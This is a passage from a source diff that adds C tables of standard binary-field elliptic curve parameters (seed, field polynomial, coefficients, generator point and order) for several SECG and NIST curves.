+        0x10, 0x3F, 0xAE, 0xC7, 0x4D, 0x69, 0x6E, 0x67, 0x68, 0x75, 0x61, 0x51,
+        0x75, 0x77, 0x7F, 0xC5, 0xB1, 0x91, 0xEF, 0x30,
+        /* p */
+        0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80,
+        0x01,
+        /* a */
+        0x00, 0x17, 0x85, 0x8F, 0xEB, 0x7A, 0x98, 0x97, 0x51, 0x69, 0xE1, 0x71,
+        0xF7, 0x7B, 0x40, 0x87, 0xDE, 0x09, 0x8A, 0xC8, 0xA9, 0x11, 0xDF, 0x7B,
+        0x01,
+        /* b */
+        0x00, 0xFD, 0xFB, 0x49, 0xBF, 0xE6, 0xC3, 0xA8, 0x9F, 0xAC, 0xAD, 0xAA,
+        0x7A, 0x1E, 0x5B, 0xBC, 0x7C, 0xC1, 0xC2, 0xE5, 0xD8, 0x31, 0x47, 0x88,
+        0x14,
+        /* x */
+        0x01, 0xF4, 0x81, 0xBC, 0x5F, 0x0F, 0xF8, 0x4A, 0x74, 0xAD, 0x6C, 0xDF,
+        0x6F, 0xDE, 0xF4, 0xBF, 0x61, 0x79, 0x62, 0x53, 0x72, 0xD8, 0xC0, 0xC5,
+        0xE1,
+        /* y */
+        0x00, 0x25, 0xE3, 0x99, 0xF2, 0x90, 0x37, 0x12, 0xCC, 0xF3, 0xEA, 0x9E,
+        0x3A, 0x1A, 0xD1, 0x7F, 0xB0, 0xB3, 0x20, 0x1B, 0x6A, 0xF7, 0xCE, 0x1B,
+        0x05,
+        /* order */
+        0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0xC7, 0xF3, 0x4A, 0x77, 0x8F, 0x44, 0x3A, 0xCC, 0x92, 0x0E, 0xBA,
+        0x49
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[20 + 25 * 6];
+} _EC_SECG_CHAR2_193R2 = {
+    {
+        NID_X9_62_characteristic_two_field, 20, 25, 2
+    },
+    {
+        /* seed */
+        0x10, 0xB7, 0xB4, 0xD6, 0x96, 0xE6, 0x76, 0x87, 0x56, 0x15, 0x17, 0x51,
+        0x37, 0xC8, 0xA1, 0x6F, 0xD0, 0xDA, 0x22, 0x11,
+        /* p */
+        0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80,
+        0x01,
+        /* a */
+        0x01, 0x63, 0xF3, 0x5A, 0x51, 0x37, 0xC2, 0xCE, 0x3E, 0xA6, 0xED, 0x86,
+        0x67, 0x19, 0x0B, 0x0B, 0xC4, 0x3E, 0xCD, 0x69, 0x97, 0x77, 0x02, 0x70,
+        0x9B,
+        /* b */
+        0x00, 0xC9, 0xBB, 0x9E, 0x89, 0x27, 0xD4, 0xD6, 0x4C, 0x37, 0x7E, 0x2A,
+        0xB2, 0x85, 0x6A, 0x5B, 0x16, 0xE3, 0xEF, 0xB7, 0xF6, 0x1D, 0x43, 0x16,
+        0xAE,
+        /* x */
+        0x00, 0xD9, 0xB6, 0x7D, 0x19, 0x2E, 0x03, 0x67, 0xC8, 0x03, 0xF3, 0x9E,
+        0x1A, 0x7E, 0x82, 0xCA, 0x14, 0xA6, 0x51, 0x35, 0x0A, 0xAE, 0x61, 0x7E,
+        0x8F,
+        /* y */
+        0x01, 0xCE, 0x94, 0x33, 0x56, 0x07, 0xC3, 0x04, 0xAC, 0x29, 0xE7, 0xDE,
+        0xFB, 0xD9, 0xCA, 0x01, 0xF5, 0x96, 0xF9, 0x27, 0x22, 0x4C, 0xDE, 0xCF,
+        0x6C,
+        /* order */
+        0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x01, 0x5A, 0xAB, 0x56, 0x1B, 0x00, 0x54, 0x13, 0xCC, 0xD4, 0xEE, 0x99,
+        0xD5
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 30 * 6];
+} _EC_NIST_CHAR2_233K = {
+    {
+        NID_X9_62_characteristic_two_field, 0, 30, 4
+    },
+    {
+        /* no seed */
+        0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
+        /* a */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        /* b */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
+        /* x */
+        0x01, 0x72, 0x32, 0xBA, 0x85, 0x3A, 0x7E, 0x73, 0x1A, 0xF1, 0x29, 0xF2,
+        0x2F, 0xF4, 0x14, 0x95, 0x63, 0xA4, 0x19, 0xC2, 0x6B, 0xF5, 0x0A, 0x4C,
+        0x9D, 0x6E, 0xEF, 0xAD, 0x61, 0x26,
+        /* y */
+        0x01, 0xDB, 0x53, 0x7D, 0xEC, 0xE8, 0x19, 0xB7, 0xF7, 0x0F, 0x55, 0x5A,
+        0x67, 0xC4, 0x27, 0xA8, 0xCD, 0x9B, 0xF1, 0x8A, 0xEB, 0x9B, 0x56, 0xE0,
+        0xC1, 0x10, 0x56, 0xFA, 0xE6, 0xA3,
+        /* order */
+        0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x06, 0x9D, 0x5B, 0xB9, 0x15, 0xBC, 0xD4, 0x6E, 0xFB,
+        0x1A, 0xD5, 0xF1, 0x73, 0xAB, 0xDF
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[20 + 30 * 6];
+} _EC_NIST_CHAR2_233B = {
+    {
+        NID_X9_62_characteristic_two_field, 20, 30, 2
+    },
+    {
+        /* seed */
+        0x74, 0xD5, 0x9F, 0xF0, 0x7F, 0x6B, 0x41, 0x3D, 0x0E, 0xA1, 0x4B, 0x34,
+        0x4B, 0x20, 0xA2, 0xDB, 0x04, 0x9B, 0x50, 0xC3,
+        /* p */
+        0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
+        /* a */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
+        /* b */
+        0x00, 0x66, 0x64, 0x7E, 0xDE, 0x6C, 0x33, 0x2C, 0x7F, 0x8C, 0x09, 0x23,
+        0xBB, 0x58, 0x21, 0x3B, 0x33, 0x3B, 0x20, 0xE9, 0xCE, 0x42, 0x81, 0xFE,
+        0x11, 0x5F, 0x7D, 0x8F, 0x90, 0xAD,
+        /* x */
+        0x00, 0xFA, 0xC9, 0xDF, 0xCB, 0xAC, 0x83, 0x13, 0xBB, 0x21, 0x39, 0xF1,
+        0xBB, 0x75, 0x5F, 0xEF, 0x65, 0xBC, 0x39, 0x1F, 0x8B, 0x36, 0xF8, 0xF8,
+        0xEB, 0x73, 0x71, 0xFD, 0x55, 0x8B,
+        /* y */
+        0x01, 0x00, 0x6A, 0x08, 0xA4, 0x19, 0x03, 0x35, 0x06, 0x78, 0xE5, 0x85,
+        0x28, 0xBE, 0xBF, 0x8A, 0x0B, 0xEF, 0xF8, 0x67, 0xA7, 0xCA, 0x36, 0x71,
+        0x6F, 0x7E, 0x01, 0xF8, 0x10, 0x52,
+        /* order */
+        0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x13, 0xE9, 0x74, 0xE7, 0x2F, 0x8A, 0x69, 0x22, 0x03,
+        0x1D, 0x26, 0x03, 0xCF, 0xE0, 0xD7
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 30 * 6];
+} _EC_SECG_CHAR2_239K1 = {
+    {
+        NID_X9_62_characteristic_two_field, 0, 30, 4
+    },
+    {
+        /* no seed */
+        0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
+        /* a */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        /* b */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
+        /* x */
+        0x29, 0xA0, 0xB6, 0xA8, 0x87, 0xA9, 0x83, 0xE9, 0x73, 0x09, 0x88, 0xA6,
+        0x87, 0x27, 0xA8, 0xB2, 0xD1, 0x26, 0xC4, 0x4C, 0xC2, 0xCC, 0x7B, 0x2A,
+        0x65, 0x55, 0x19, 0x30, 0x35, 0xDC,
+        /* y */
+        0x76, 0x31, 0x08, 0x04, 0xF1, 0x2E, 0x54, 0x9B, 0xDB, 0x01, 0x1C, 0x10,
+        0x30, 0x89, 0xE7, 0x35, 0x10, 0xAC, 0xB2, 0x75, 0xFC, 0x31, 0x2A, 0x5D,
+        0xC6, 0xB7, 0x65, 0x53, 0xF0, 0xCA,
+        /* order */
+        0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x5A, 0x79, 0xFE, 0xC6, 0x7C, 0xB6, 0xE9, 0x1F, 0x1C,
+        0x1D, 0xA8, 0x00, 0xE4, 0x78, 0xA5
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 36 * 6];
+} _EC_NIST_CHAR2_283K = {
+    {
+        NID_X9_62_characteristic_two_field, 0, 36, 4
+    },
+    {
+        /* no seed */
+        0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0xA1,
+        /* a */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        /* b */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
+        /* x */
+        0x05, 0x03, 0x21, 0x3F, 0x78, 0xCA, 0x44, 0x88, 0x3F, 0x1A, 0x3B, 0x81,
+        0x62, 0xF1, 0x88, 0xE5, 0x53, 0xCD, 0x26, 0x5F, 0x23, 0xC1, 0x56, 0x7A,
+        0x16, 0x87, 0x69, 0x13, 0xB0, 0xC2, 0xAC, 0x24, 0x58, 0x49, 0x28, 0x36,
+        /* y */
+        0x01, 0xCC, 0xDA, 0x38, 0x0F, 0x1C, 0x9E, 0x31, 0x8D, 0x90, 0xF9, 0x5D,
+        0x07, 0xE5, 0x42, 0x6F, 0xE8, 0x7E, 0x45, 0xC0, 0xE8, 0x18, 0x46, 0x98,
+        0xE4, 0x59, 0x62, 0x36, 0x4E, 0x34, 0x11, 0x61, 0x77, 0xDD, 0x22, 0x59,
+        /* order */
+        0x01, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xE9, 0xAE, 0x2E, 0xD0, 0x75, 0x77,
+        0x26, 0x5D, 0xFF, 0x7F, 0x94, 0x45, 0x1E, 0x06, 0x1E, 0x16, 0x3C, 0x61
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[20 + 36 * 6];
+} _EC_NIST_CHAR2_283B = {
+    {
+        NID_X9_62_characteristic_two_field, 20, 36, 2
+    },
+    {
+        /* no seed */
+        0x77, 0xE2, 0xB0, 0x73, 0x70, 0xEB, 0x0F, 0x83, 0x2A, 0x6D, 0xD5, 0xB6,
+        0x2D, 0xFC, 0x88, 0xCD, 0x06, 0xBB, 0x84, 0xBE,
+        /* p */
+        0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0xA1,
+        /* a */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
+        /* b */
+        0x02, 0x7B, 0x68, 0x0A, 0xC8, 0xB8, 0x59, 0x6D, 0xA5, 0xA4, 0xAF, 0x8A,
+        0x19, 0xA0, 0x30, 0x3F, 0xCA, 0x97, 0xFD, 0x76, 0x45, 0x30, 0x9F, 0xA2,
+        0xA5, 0x81, 0x48, 0x5A, 0xF6, 0x26, 0x3E, 0x31, 0x3B, 0x79, 0xA2, 0xF5,
+        /* x */
+        0x05, 0xF9, 0x39, 0x25, 0x8D, 0xB7, 0xDD, 0x90, 0xE1, 0x93, 0x4F, 0x8C,
+        0x70, 0xB0, 0xDF, 0xEC, 0x2E, 0xED, 0x25, 0xB8, 0x55, 0x7E, 0xAC, 0x9C,
+        0x80, 0xE2, 0xE1, 0x98, 0xF8, 0xCD, 0xBE, 0xCD, 0x86, 0xB1, 0x20, 0x53,
+        /* y */
+        0x03, 0x67, 0x68, 0x54, 0xFE, 0x24, 0x14, 0x1C, 0xB9, 0x8F, 0xE6, 0xD4,
+        0xB2, 0x0D, 0x02, 0xB4, 0x51, 0x6F, 0xF7, 0x02, 0x35, 0x0E, 0xDD, 0xB0,
+        0x82, 0x67, 0x79, 0xC8, 0x13, 0xF0, 0xDF, 0x45, 0xBE, 0x81, 0x12, 0xF4,
+        /* order */
+        0x03, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xEF, 0x90, 0x39, 0x96, 0x60, 0xFC,
+        0x93, 0x8A, 0x90, 0x16, 0x5B, 0x04, 0x2A, 0x7C, 0xEF, 0xAD, 0xB3, 0x07
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 52 * 6];
+} _EC_NIST_CHAR2_409K = {
+    {
+        NID_X9_62_characteristic_two_field, 0, 52, 4
+    },
+    {
+        /* no seed */
+        /* p */
+        0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x01,
+        /* a */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00,
+        /* b */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x01,
+        /* x */
+        0x00, 0x60, 0xF0, 0x5F, 0x65, 0x8F, 0x49, 0xC1, 0xAD, 0x3A, 0xB1, 0x89,
+        0x0F, 0x71, 0x84, 0x21, 0x0E, 0xFD, 0x09, 0x87, 0xE3, 0x07, 0xC8, 0x4C,
+        0x27, 0xAC, 0xCF, 0xB8, 0xF9, 0xF6, 0x7C, 0xC2, 0xC4, 0x60, 0x18, 0x9E,
+        0xB5, 0xAA, 0xAA, 0x62, 0xEE, 0x22, 0x2E, 0xB1, 0xB3, 0x55, 0x40, 0xCF,
+        0xE9, 0x02, 0x37, 0x46,
+        /* y */
+        0x01, 0xE3, 0x69, 0x05, 0x0B, 0x7C, 0x4E, 0x42, 0xAC, 0xBA, 0x1D, 0xAC,
+        0xBF, 0x04, 0x29, 0x9C, 0x34, 0x60, 0x78, 0x2F, 0x91, 0x8E, 0xA4, 0x27,
+        0xE6, 0x32, 0x51, 0x65, 0xE9, 0xEA, 0x10, 0xE3, 0xDA, 0x5F, 0x6C, 0x42,
+        0xE9, 0xC5, 0x52, 0x15, 0xAA, 0x9C, 0xA2, 0x7A, 0x58, 0x63, 0xEC, 0x48,
+        0xD8, 0xE0, 0x28, 0x6B,
+        /* order */
+        0x00, 0x7F, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xFF, 0xFF, 0xFE, 0x5F, 0x83, 0xB2, 0xD4, 0xEA, 0x20, 0x40, 0x0E, 0xC4,
+        0x55, 0x7D, 0x5E, 0xD3, 0xE3, 0xE7, 0xCA, 0x5B, 0x4B, 0x5C, 0x83, 0xB8,
+        0xE0, 0x1E, 0x5F, 0xCF
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[20 + 52 * 6];
+} _EC_NIST_CHAR2_409B = {
+    {
+        NID_X9_62_characteristic_two_field, 20, 52, 2
+    },
+    {
+        /* seed */
+        0x40, 0x99, 0xB5, 0xA4, 0x57, 0xF9, 0xD6, 0x9F, 0x79, 0x21, 0x3D, 0x09,
+        0x4C, 0x4B, 0xCD, 0x4D, 0x42, 0x62, 0x21, 0x0B,
+        /* p */
+        0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x01,
+        /* a */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x01,
+        /* b */
+        0x00, 0x21, 0xA5, 0xC2, 0xC8, 0xEE, 0x9F, 0xEB, 0x5C, 0x4B, 0x9A, 0x75,
+        0x3B, 0x7B, 0x47, 0x6B, 0x7F, 0xD6, 0x42, 0x2E, 0xF1, 0xF3, 0xDD, 0x67,
+        0x47, 0x61, 0xFA, 0x99, 0xD6, 0xAC, 0x27, 0xC8, 0xA9, 0xA1, 0x97, 0xB2,
+        0x72, 0x82, 0x2F, 0x6C, 0xD5, 0x7A, 0x55, 0xAA, 0x4F, 0x50, 0xAE, 0x31,
+        0x7B, 0x13, 0x54, 0x5F,
+        /* x */
+        0x01, 0x5D, 0x48, 0x60, 0xD0, 0x88, 0xDD, 0xB3, 0x49, 0x6B, 0x0C, 0x60,
+        0x64, 0x75, 0x62, 0x60, 0x44, 0x1C, 0xDE, 0x4A, 0xF1, 0x77, 0x1D, 0x4D,
+        0xB0, 0x1F, 0xFE, 0x5B, 0x34, 0xE5, 0x97, 0x03, 0xDC, 0x25, 0x5A, 0x86,
+        0x8A, 0x11, 0x80, 0x51, 0x56, 0x03, 0xAE, 0xAB, 0x60, 0x79, 0x4E, 0x54,
+        0xBB, 0x79, 0x96, 0xA7,
+        /* y */
+        0x00, 0x61, 0xB1, 0xCF, 0xAB, 0x6B, 0xE5, 0xF3, 0x2B, 0xBF, 0xA7, 0x83,
+        0x24, 0xED, 0x10, 0x6A, 0x76, 0x36, 0xB9, 0xC5, 0xA7, 0xBD, 0x19, 0x8D,
+        0x01, 0x58, 0xAA, 0x4F, 0x54, 0x88, 0xD0, 0x8F, 0x38, 0x51, 0x4F, 0x1F,
+        0xDF, 0x4B, 0x4F, 0x40, 0xD2, 0x18, 0x1B, 0x36, 0x81, 0xC3, 0x64, 0xBA,
+        0x02, 0x73, 0xC7, 0x06,
+        /* order */
+        0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x01, 0xE2, 0xAA, 0xD6, 0xA6, 0x12, 0xF3, 0x33, 0x07, 0xBE,
+        0x5F, 0xA4, 0x7C, 0x3C, 0x9E, 0x05, 0x2F, 0x83, 0x81, 0x64, 0xCD, 0x37,
+        0xD9, 0xA2, 0x11, 0x73
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[0 + 72 * 6];
+} _EC_NIST_CHAR2_571K = {
+    {
+        NID_X9_62_characteristic_two_field, 0, 72, 4
+    },
+    {
+        /* no seed */
+        /* p */
+        0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x25,
+        /* a */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        /* b */
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
+        /* x */
+        0x02, 0x6E, 0xB7, 0xA8, 0x59, 0x92, 0x3F, 0xBC, 0x82, 0x18, 0x96, 0x31,
+        0xF8, 0x10, 0x3F, 0xE4, 0xAC, 0x9C, 0xA2, 0x97, 0x00, 0x12, 0xD5, 0xD4,
+        0x60, 0x24, 0x80, 0x48, 0x01, 0x84, 0x1C, 0xA4, 0x43, 0x70, 0x95, 0x84,
+        0x93, 0xB2, 0x05, 0xE6, 0x47, 0xDA, 0x30, 0x4D, 0xB4, 0xCE, 0xB0, 0x8C,
+        0xBB, 0xD1, 0xBA, 0x39, 0x49, 0x47, 0x76, 0xFB, 0x98, 0x8B, 0x47, 0x17,
+        0x4D, 0xCA, 0x88, 0xC7, 0xE2, 0x94, 0x52, 0x83, 0xA0, 0x1C, 0x89, 0x72,
+        /* y */
+        0x03, 0x49, 0xDC, 0x80, 0x7F, 0x4F, 0xBF, 0x37, 0x4F, 0x4A, 0xEA, 0xDE,
+        0x3B, 0xCA, 0x95, 0x31, 0x4D, 0xD5, 0x8C, 0xEC, 0x9F, 0x30, 0x7A, 0x54,
+        0xFF, 0xC6, 0x1E, 0xFC, 0x00, 0x6D, 0x8A, 0x2C, 0x9D, 0x49, 0x79, 0xC0,
+        0xAC, 0x44, 0xAE, 0xA7, 0x4F, 0xBE, 0xBB, 0xB9, 0xF7, 0x72, 0xAE, 0xDC,
+        0xB6, 0x20, 0xB0, 0x1A, 0x7B, 0xA7, 0xAF, 0x1B, 0x32, 0x04, 0x30, 0xC8,
+        0x59, 0x19, 0x84, 0xF6, 0x01, 0xCD, 0x4C, 0x14, 0x3E, 0xF1, 0xC7, 0xA3,
+        /* order */
+        0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x13, 0x18, 0x50, 0xE1, 0xF1, 0x9A, 0x63, 0xE4, 0xB3, 0x91, 0xA8, 0xDB,
+        0x91, 0x7F, 0x41, 0x38, 0xB6, 0x30, 0xD8, 0x4B, 0xE5, 0xD6, 0x39, 0x38,
+        0x1E, 0x91, 0xDE, 0xB4, 0x5C, 0xFE, 0x77, 0x8F, 0x63, 0x7C, 0x10, 0x01
+    }
+};
+
+static const struct {
+    EC_CURVE_DATA h;
+    unsigned char data[20 + 72 * 6];
+} _EC_NIST_CHAR2_571B = {
+    {
